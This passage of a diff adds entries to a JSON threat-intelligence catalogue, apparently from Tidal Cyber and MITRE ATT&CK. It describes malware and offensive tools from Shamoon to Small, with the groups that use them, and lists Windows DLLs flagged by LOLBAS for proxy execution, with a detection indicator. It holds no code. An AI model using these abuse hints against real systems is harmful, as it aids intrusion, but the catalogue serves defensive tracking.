"8901ac23-6b50-410c-b0dd-d8174a86f9b3", + "type": "similar" + }, + { + "dest-uuid": "a834945d-2e57-44e0-9795-8bdc73208f61", + "type": "similar" + } + ], + "uuid": "840db1db-e262-4d6f-b6e3-2a64696a41c5", + "value": "Shamoon" + }, + { + "description": "[Shark](https://app.tidalcyber.com/software/278da5e8-4d4c-4c45-ad72-8f078872fb4a) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd); it has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least July 2021.[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1019", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "99854cc8-f202-4e03-aa0a-4f8a4af93229", + "type": "similar" + } + ], + "uuid": "278da5e8-4d4c-4c45-ad72-8f078872fb4a", + "value": "Shark" + }, + { + "description": "SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a \".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.\"[[GitHub SharpChromium](/references/ca1956a5-72f2-43ad-a17f-a52ca97bd84e)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5075", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + } + ], + "uuid": "311e8944-2157-4616-8b95-d75020e21c35", + "value": "SharpChromium" + }, + { + "description": "[SharpDisco](https://app.tidalcyber.com/software/4ed1e83b-a208-5518-bed2-d07c1b289da2) is a dropper developed in C# that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 to load malicious plugins.[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1089", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f31df12e-66ea-5a49-87bc-2bc1756a89fc", + "type": "used-by" + }, + { + "dest-uuid": "1fefb062-feda-484a-8f10-0cebf65e20e3", + "type": "similar" + } + ], + "uuid": "4ed1e83b-a208-5518-bed2-d07c1b289da2", + "value": "SharpDisco" + }, + { + "description": "SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.[[GitHub SharpRoast](/references/43a2e05d-4662-4a5c-9c99-3165f0d71169)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5060", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + } + ], + "uuid": "54a5c881-c1ad-40d0-88c0-6c32b9ef95cb", + "value": "SharpRoast" + }, + { + "description": "SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5004", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + } + ], + "uuid": "a202b37f-5c61-410b-bb14-a3e6b2b82833", + "value": "SharpShares" + }, + { + "description": "[SharpStage](https://app.tidalcyber.com/software/564643fd-7113-490e-9f6a-f0cc3f0e1a4c) is a .NET malware with backdoor capabilities.[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)][[BleepingComputer Molerats Dec 2020](https://app.tidalcyber.com/references/307108c8-9c72-4f31-925b-0b9bd4b31e7b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0546", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "0ba9281c-93fa-4b29-8e9e-7ef918c7b13a", + "type": "similar" + } + ], + "uuid": "564643fd-7113-490e-9f6a-f0cc3f0e1a4c", + "value": "SharpStage" + }, + { + "description": "[SHARPSTATS](https://app.tidalcyber.com/software/f655306f-f7b4-4eec-9bd6-ac75142fcb43) is a .NET backdoor used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2019.[[TrendMicro POWERSTATS V3 June 2019](https://app.tidalcyber.com/references/bf9847e2-f2bb-4a96-af8f-56e1ffc45cf7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0450", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "73c4711b-407a-449d-b269-e3b1531fe7a9", + "type": "similar" + } + ], + "uuid": "f655306f-f7b4-4eec-9bd6-ac75142fcb43", + "value": "SHARPSTATS" + }, + { + "description": "[[Shdocvw.dll - LOLBAS Project](/references/0739d5fe-b460-4ed4-be75-cff422643a32)]", + "meta": { + "id": "89e74cc6-79a8-4d02-9d12-46076a8b56ae", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "67323b8a-e805-4503-8a40-d47f229453a0", + "type": "similar" + } + ], + "uuid": "8a0c4826-3d7a-4eac-9f53-1a82316ea81f", + "value": "Shdocvw.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Shell Doc Object and Control Library.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\shdocvw.dll\n* c:\\windows\\syswow64\\shdocvw.dll\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/](http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/)\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/bohops/status/997690405092290561](https://twitter.com/bohops/status/997690405092290561)\n* [https://windows10dll.nirsoft.net/shdocvw_dll.html](https://windows10dll.nirsoft.net/shdocvw_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Shdocvw.dll - LOLBAS Project](/references/0739d5fe-b460-4ed4-be75-cff422643a32)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5196", + "source": "Tidal Cyber", + "tags": [ + "2c0f0b44-9b09-49a0-8dc5-d9fdcc515825", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8a0c4826-3d7a-4eac-9f53-1a82316ea81f", + "type": "similar" + } + ], + "uuid": "67323b8a-e805-4503-8a40-d47f229453a0", + "value": "Shdocvw" + }, + { + "description": "[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]", + "meta": { + "id": "f83926fc-f19b-4c3c-9b02-f8e8e06eceed", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "edf31b62-e9db-43c8-b9ef-55afd6b0404c", + "type": "similar" + } + ], + "uuid": "d60406be-9e87-4325-b130-ca74a8e3cb6f", + "value": "Shell32.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Shell Common Dll\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\shell32.dll\n* c:\\windows\\syswow64\\shell32.dll\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/885258886428725250](https://twitter.com/Hexacorn/status/885258886428725250)\n* [https://twitter.com/pabraeken/status/991768766898941953](https://twitter.com/pabraeken/status/991768766898941953)\n* [https://twitter.com/mattifestation/status/776574940128485376](https://twitter.com/mattifestation/status/776574940128485376)\n* [https://twitter.com/KyleHanslovan/status/905189665120149506](https://twitter.com/KyleHanslovan/status/905189665120149506)\n* [https://windows10dll.nirsoft.net/shell32_dll.html](https://windows10dll.nirsoft.net/shell32_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [rundll32_control_rundll_hunt.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml)[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5197", + "source": "Tidal Cyber", + "tags": [ + "e0b9882e-b9bb-4c16-b3d9-9268866eded0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d60406be-9e87-4325-b130-ca74a8e3cb6f", + "type": "similar" + } + ], + "uuid": "edf31b62-e9db-43c8-b9ef-55afd6b0404c", + "value": "Shell32" + }, + { + "description": "[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]", + "meta": { + "id": "406ba722-6a7d-4cc4-82f6-18cfe36ddcc9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "691b3a37-af46-47d2-a027-d93d901e0dac", + "type": "similar" + } + ], + "uuid": "03cadf3b-6313-4f0f-8ff1-b9944d6f86f2", + "value": "Shimgvw.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Photo Gallery Viewer\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\shimgvw.dll\n* c:\\windows\\syswow64\\shimgvw.dll\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1479080793003671557](https://twitter.com/eral4m/status/1479080793003671557)\n\n**Detection:**\n* IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5198", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "03cadf3b-6313-4f0f-8ff1-b9944d6f86f2", + "type": "similar" + } + ], + "uuid": "691b3a37-af46-47d2-a027-d93d901e0dac", + "value": "Shimgvw" + }, + { + "description": "[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7) has been used by the suspected China-based adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name \"[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. [[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0444", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8bc69792-c26d-4493-87e3-d8e47605fed8", + "type": "used-by" + }, + { + "dest-uuid": "5763217a-05b6-4edd-9bca-057e47b5e403", + "type": "similar" + } + ], + "uuid": "a3287231-351f-472f-96cc-24db2e3829c7", + "value": "ShimRat" + }, + { + "description": "[ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) is a tool used by suspected Chinese adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0445", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8bc69792-c26d-4493-87e3-d8e47605fed8", + "type": "used-by" + }, + { + "dest-uuid": "115f88dd-0618-4389-83cb-98d33ae81848", + "type": "similar" + } + ], + "uuid": "77d9c948-93e3-4e12-9764-4da7570d9275", + "value": "ShimRatReporter" + }, + { + "description": "[SHIPSHAPE](https://app.tidalcyber.com/software/3db0b464-ec5d-4cdd-86c2-62eac9c8acd6) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", + "meta": { + "platforms": [], + "software_attack_id": "S0028", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "type": "used-by" + }, + { + "dest-uuid": "b1de6916-7a22-4460-8d26-6b5483ffaa2a", + "type": "similar" + } + ], + "uuid": "3db0b464-ec5d-4cdd-86c2-62eac9c8acd6", + "value": "SHIPSHAPE" + }, + { + "description": "[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]", + "meta": { + "id": "c7d4b1ec-bd3a-455c-92a7-b45249bb4e56" + }, + "related": [ + { + "dest-uuid": "49351818-579e-4298-9137-03b3dc699e22", + "type": "similar" + } + ], + "uuid": "1632745f-2d2f-4720-8ce4-53750459cb33", + "value": "Backdoor.APT.CookieCutter" + }, + { + "description": "[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]", + "meta": { + "id": "da5aae0a-6a9c-4d09-b65a-75db8eaf3365" + }, + "related": [ + { + "dest-uuid": "49351818-579e-4298-9137-03b3dc699e22", + "type": "similar" + } + ], + "uuid": "9e091930-0bc1-48d3-b49a-046d0ef9819c", + "value": "Pirpi" + }, + { + "description": "[SHOTPUT](https://app.tidalcyber.com/software/49351818-579e-4298-9137-03b3dc699e22) is a custom backdoor used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9). [[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0063", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "58adaaa8-f1e8-4606-9a08-422e568461eb", + "type": "similar" + }, + { + "dest-uuid": "1632745f-2d2f-4720-8ce4-53750459cb33", + "type": "similar" + }, + { + "dest-uuid": "9e091930-0bc1-48d3-b49a-046d0ef9819c", + "type": "similar" + } + ], + "uuid": "49351818-579e-4298-9137-03b3dc699e22", + "value": "SHOTPUT" + }, + { + "description": "[SHUTTERSPEED](https://app.tidalcyber.com/software/5b2d82a6-ed96-485d-bca9-2320590de890) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66). [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [], + "software_attack_id": "S0217", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "4189a679-72ed-4a89-a57c-7f689712ecf8", + "type": "similar" + } + ], + "uuid": "5b2d82a6-ed96-485d-bca9-2320590de890", + "value": "SHUTTERSPEED" + }, + { + "description": "[Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) variants in early 2021 during its investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) and the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a).[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0589", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "979adb5a-dc30-48f0-9e3d-9a26d866928c", + "type": "similar" + } + ], + "uuid": "ea0a1282-f2bf-4ae0-a19c-d7e379c2309b", + "value": "Sibot" + }, + { + "description": "[SideTwist](https://app.tidalcyber.com/software/61227a76-d315-4339-803a-e024f96e089e) is a C-based backdoor that has been used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) since at least 2021.[[Check Point APT34 April 2021](https://app.tidalcyber.com/references/593e8f9f-88ec-4bdc-90c3-1a320fa8a041)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0610", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "df4cd566-ff2f-4d08-976d-8c86e95782de", + "type": "similar" + } + ], + "uuid": "61227a76-d315-4339-803a-e024f96e089e", + "value": "SideTwist" + }, + { + "description": "[SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.[[GitHub SILENTTRINITY March 2022](https://app.tidalcyber.com/references/cff66280-c592-4e3c-a56c-32a9620cf95c)][[Security Affairs SILENTTRINITY July 2019](https://app.tidalcyber.com/references/b4945fc0-b89b-445c-abfb-14959deba3d0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0692", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1244e058-fa10-48cb-b484-0bcf671107ae", + "type": "similar" + } + ], + "uuid": "4765999f-c35e-4a9f-8284-9f10a17e6c34", + "value": "SILENTTRINITY" + }, + { + "description": "[Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) was first observed in March 2021.[[Unit 42 Siloscape Jun 2021](https://app.tidalcyber.com/references/4be128a7-97b8-48fa-8a52-a53c1e56f086)]", + "meta": { + "platforms": [ + "Containers", + "Windows" + ], + "software_attack_id": "S0623", + "source": "MITRE", + "tags": [ + "4fa6f8e1-b0d5-4169-8038-33e355c08bde" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4fbd565b-bf55-4ac7-80b4-b183a7b64b9c", + "type": "similar" + } + ], + "uuid": "8ea75674-cc08-40cf-824c-40eb5cd6097e", + "value": "Siloscape" + }, + { + "description": "[Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. [[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)] Functionality similar to [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is included as a module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0007", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "89f63ae4-f229-4a5c-95ad-6f22ed2b5c49", + "type": "similar" + } + ], + "uuid": "206453a4-a298-4cab-9fdf-f136a4e0c761", + "value": "Skeleton Key" + }, + { + "description": "[Skidmap](https://app.tidalcyber.com/software/cc91d3d4-bbf5-4a9c-b43a-2ba034db4858) is a kernel-mode rootkit used for cryptocurrency mining.[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0468", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4b68b5ea-2e1b-4225-845b-8632f702b9a0", + "type": "similar" + } + ], + "uuid": "cc91d3d4-bbf5-4a9c-b43a-2ba034db4858", + "value": "Skidmap" + }, + { + "description": "[Sliver](https://app.tidalcyber.com/software/bbd16b7b-7e35-4a11-86ff-9b19e17bdab3) is an open source, cross-platform, red team command and control framework written in Golang.[[Bishop Fox Sliver Framework August 2019](https://app.tidalcyber.com/references/51e67e37-2d61-4228-999b-bec6f80cf106)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0633", + "source": "MITRE", + "tags": [ + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "11f8d7eb-1927-4806-9267-3a11d4d4d6be", + "type": "similar" + } + ], + "uuid": "bbd16b7b-7e35-4a11-86ff-9b19e17bdab3", + "value": "Sliver" + }, + { + "description": "Kaspersky Labs refers to the \"mediaplayer.exe\" dropper within [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) as the JackOfHearts.[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]", + "meta": { + "id": "331ec335-52e8-4040-b21b-dac154e834de" + }, + "related": [ + { + "dest-uuid": "563c6534-497e-4d65-828c-420d5bb2041a", + "type": "similar" + } + ], + "uuid": "1defcdcc-c10d-40a8-afb2-5ebc68c4f752", + "value": "JackOfHearts" + }, + { + "description": "Kaspersky Labs assesses [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is an older variant of a malware family it refers to as the QueenOfClubs.[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]", + "meta": { + "id": "1d818a0e-cba6-408b-a9ea-1adae7d31e5e" + }, + "related": [ + { + "dest-uuid": "563c6534-497e-4d65-828c-420d5bb2041a", + "type": "similar" + } + ], + "uuid": "dba41372-a48f-412e-ad89-3acdfba47cd0", + "value": "QueenOfClubs" + }, + { + "description": "[SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017.[[CISA MAR SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/57c3256c-0d24-4647-9037-fefe1c88ad61)][[Costin Raiu IAmTheKing October 2020](https://app.tidalcyber.com/references/2be88843-ed3a-460e-87c1-85aa50e827c8)] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[[USCYBERCOM SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/600de668-f128-4368-8667-24ed9a9db47a)][[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)] \n\nIn October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is part of an activity cluster it refers to as \"IAmTheKing\".[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)] ESET also noted code similarity between [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) and droppers used by a group it refers to as \"PowerPool\".[[ESET PowerPool Code October 2020](https://app.tidalcyber.com/references/d583b409-35bd-45ea-8f2a-c0d566a6865b)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0533", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "feb2d7bb-aacb-48df-ad04-ccf41a30cd90", + "type": "similar" + }, + { + "dest-uuid": "1defcdcc-c10d-40a8-afb2-5ebc68c4f752", + "type": "similar" + }, + { + "dest-uuid": "dba41372-a48f-412e-ad89-3acdfba47cd0", + "type": "similar" + } + ], + "uuid": "563c6534-497e-4d65-828c-420d5bb2041a", + "value": "SLOTHFULMEDIA" + }, + { + "description": "[SLOWDRIFT](https://app.tidalcyber.com/software/7c047a54-93cf-4dfc-ab20-d905791aebb2) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) against academic and strategic victims in South Korea. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0218", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "414dc555-c79e-4b24-a2da-9b607f7eaf16", + "type": "similar" + } + ], + "uuid": "7c047a54-93cf-4dfc-ab20-d905791aebb2", + "value": "SLOWDRIFT" + }, + { + "description": "[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]", + "meta": { + "id": "cd259728-5933-4e4d-a40c-9c831876038b" + }, + "related": [ + { + "dest-uuid": "c58028b9-2e79-4bc9-9b04-d24ea4dd4948", + "type": "similar" + } + ], + "uuid": "b4f0c7bd-888f-4b77-a269-0f85b9bd7bb0", + "value": "GRAMDOOR" + }, + { + "description": "[Small 